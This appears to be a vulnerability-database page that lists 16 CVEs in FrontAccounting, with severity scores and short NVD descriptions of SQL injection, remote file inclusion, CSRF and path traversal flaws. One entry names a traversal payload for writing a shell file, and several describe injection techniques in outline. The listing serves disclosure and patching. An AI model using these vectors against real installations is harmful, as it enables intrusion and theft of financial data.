Frontaccounting vulnerabilities
16 known vulnerabilities affecting frontaccounting/frontaccounting.
Total CVEs
16
CISA KEV
0
Public exploits
3
Exploited in wild
0
Severity breakdown
CRITICAL2HIGH11MEDIUM3
Vulnerabilities
Page 1 of 1
CVE-2007-4279P2HIGHCVSS 7.5PoCv1.12_build_312007-08-09
CVE-2007-4279 [HIGH] CVE-2007-4279: PHP remote file inclusion vulnerability in config.php in FrontAccounting 1.12 Build 31 allows remote
PHP remote file inclusion vulnerability in config.php in FrontAccounting 1.12 Build 31 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter.
nvd
CVE-2018-7176P3HIGHCVSS 8.8PoCv2.4.32018-02-16
CVE-2018-7176 [HIGH] CWE-352 CVE-2018-7176: FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users
FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).
nvd
CVE-2007-5117P3CRITICALCVSS 9.3PoCv1.132007-09-27
CVE-2007-5117 [CRITICAL] CVE-2007-5117: Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.13, when register_globa
Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.13, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter to (1) access/login.php and (2) includes/lang/language.php, different vectors than CVE-2007-4279.
nvd
CVE-2026-40521P2HIGHCVSS 8.8fixed in 2.4.202026-06-29
CVE-2026-40521 [HIGH] CWE-22 CVE-2026-40521: FrontAccounting before 2.4.20 contains a path traversal vulnerability in the attachment upload handl
FrontAccounting before 2.4.20 contains a path traversal vulnerability in the attachment upload handler that allows authenticated attackers to execute arbitrary code by uploading files with traversal sequences in the unique_name parameter. Attackers can supply path traversal sequences ../../../shell.php to write files outside the intended attachments di
nvd
CVE-2026-40524P3HIGHCVSS 8.1fixed in 2.4.202026-06-29
CVE-2026-40524 [HIGH] CWE-89 CVE-2026-40524: FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the get_gl_transactions() fu
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the get_gl_transactions() function where the filter_type parameter is concatenated directly into a SQL IN() clause without parameterization. Attackers with SA_GLANALYTIC permission can inject arbitrary SQL by supplying a closing parenthesis followed by malicious conditions to extra
nvd
CVE-2026-40523P3HIGHCVSS 8.1fixed in 2.4.202026-06-29
CVE-2026-40523 [HIGH] CWE-89 CVE-2026-40523: FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Audit Trail report handl
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Audit Trail report handler that allows authenticated attackers with SA_GLANALYTIC permission to execute arbitrary SQL queries by injecting malicious code into the PARAM_2 and PARAM_3 POST parameters. Attackers can exploit time-based blind SQL injection through SLEEP() functions
nvd
CVE-2019-5720P3CRITICALCVSS 9.8v2.4.62019-01-08
CVE-2019-5720 [CRITICAL] CWE-89 CVE-2019-5720: includes/db/class.reflines_db.inc in FrontAccounting 2.4.6 contains a SQL Injection vulnerability in
includes/db/class.reflines_db.inc in FrontAccounting 2.4.6 contains a SQL Injection vulnerability in the reference field that can allow the attacker to grab the entire database of the application via the void_transaction.php filterType parameter.
nvd
CVE-2018-1000890P3HIGHCVSS 7.5v2.4.52018-12-28
CVE-2018-1000890 [HIGH] CWE-89 CVE-2018-1000890: FrontAccounting 2.4.5 contains a Time Based Blind SQL Injection vulnerability in the parameter "filt
FrontAccounting 2.4.5 contains a Time Based Blind SQL Injection vulnerability in the parameter "filterType" in /attachments.php that can allow the attacker to grab the entire database of the application.
nvd
CVE-2026-40522P3HIGHCVSS 7.1fixed in 2.4.202026-06-29
CVE-2026-40522 [HIGH] CWE-89 CVE-2026-40522: FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Bank Statement report ha
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Bank Statement report handler that allows authenticated attackers to extract arbitrary database data by injecting UNION SELECT payloads into the PARAM_0 POST parameter. Attackers can supply malicious SQL syntax through the unparameterized WHERE clause to retrieve sensitive info
nvd
CVE-2014-3973P3HIGHCVSS 7.5≤ 2.3.20v2.3+20 more2014-06-05
CVE-2014-3973 [HIGH] CWE-89 CVE-2014-3973: Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.3.21 allow remote attackers
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.3.21 allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
nvd
CVE-2009-4037P3HIGHCVSS 7.5≤ 2.1.6v2.0+15 more2009-11-20
CVE-2009-4037 [HIGH] CWE-89 CVE-2009-4037: Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7, and 2.2.x before 2.2 RC
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7, and 2.2.x before 2.2 RC, allow remote attackers to execute arbitrary SQL commands via unspecified parameters to (1) admin/db/users_db.inc, and various other .inc and .php files under (2) admin/, (3) dimensions/, (4) gl/, (5) inventory/, (6) manufacturing/, and (7) purchasing/.
nvd
CVE-2009-4045P3HIGHCVSS 7.5≤ 2.1.6v2.0+14 more2009-11-20
CVE-2009-4045 [HIGH] CWE-89 CVE-2009-4045: Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7 allow remote attackers t
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7 allow remote attackers to execute arbitrary SQL commands via unspecified parameters to various .inc and .php files in (1) reporting/, (2) sales/, (3) sales/includes/, (4) sales/includes/db/, (5) sales/inquiry/, (6) sales/manage/, (7) sales/view/, (8) taxes/, and (9) taxes/db/.
nvd
CVE-2009-4046P3HIGHCVSS 7.5v2.22009-11-20
CVE-2009-4046 [HIGH] CWE-89 CVE-2009-4046: Multiple SQL injection vulnerabilities in FrontAccounting (FA) 2.2.x before 2.2 RC allow remote atta
Multiple SQL injection vulnerabilities in FrontAccounting (FA) 2.2.x before 2.2 RC allow remote attackers to execute arbitrary SQL commands via unspecified parameters to (1) bank_accounts.php, (2) currencies.php, (3) exchange_rates.php, (4) gl_account_types.php, and (5) gl_accounts.php in gl/manage/; and (6) audit_trail_db.inc, (7) comments_db.inc, (8) i
nvd
CVE-2007-5148P4MEDIUMCVSS 6.8v1.122007-10-01
CVE-2007-5148 [MEDIUM] CVE-2007-5148: Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.12 allow remote attacke
Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.12 allow remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter to (1) access/logout.php or certain PHP scripts under (2) admin/, (3) dimensions/, (4) gl/, (5) inventory/, (6) manufacturing/, (7) purchasing/, (8) reporting/, (9) sales/, or (10) taxes/.
nvd
CVE-2020-21244P4MEDIUMCVSS 4.9v2.4.72020-09-30
CVE-2020-21244 [MEDIUM] CWE-22 CVE-2020-21244: An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that
An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty folder via admin/inst_lang.php.
nvd
CVE-2011-3740P4MEDIUMCVSS 5.0v2.3.12011-09-23
CVE-2011-3740 [MEDIUM] CWE-200 CVE-2011-3740: FrontAccounting 2.3.1 allows remote attackers to obtain sensitive information via a direct request t
FrontAccounting 2.3.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by reporting/includes/fpdi/fpdi2tcpdf_bridge.php and certain other files.
nvd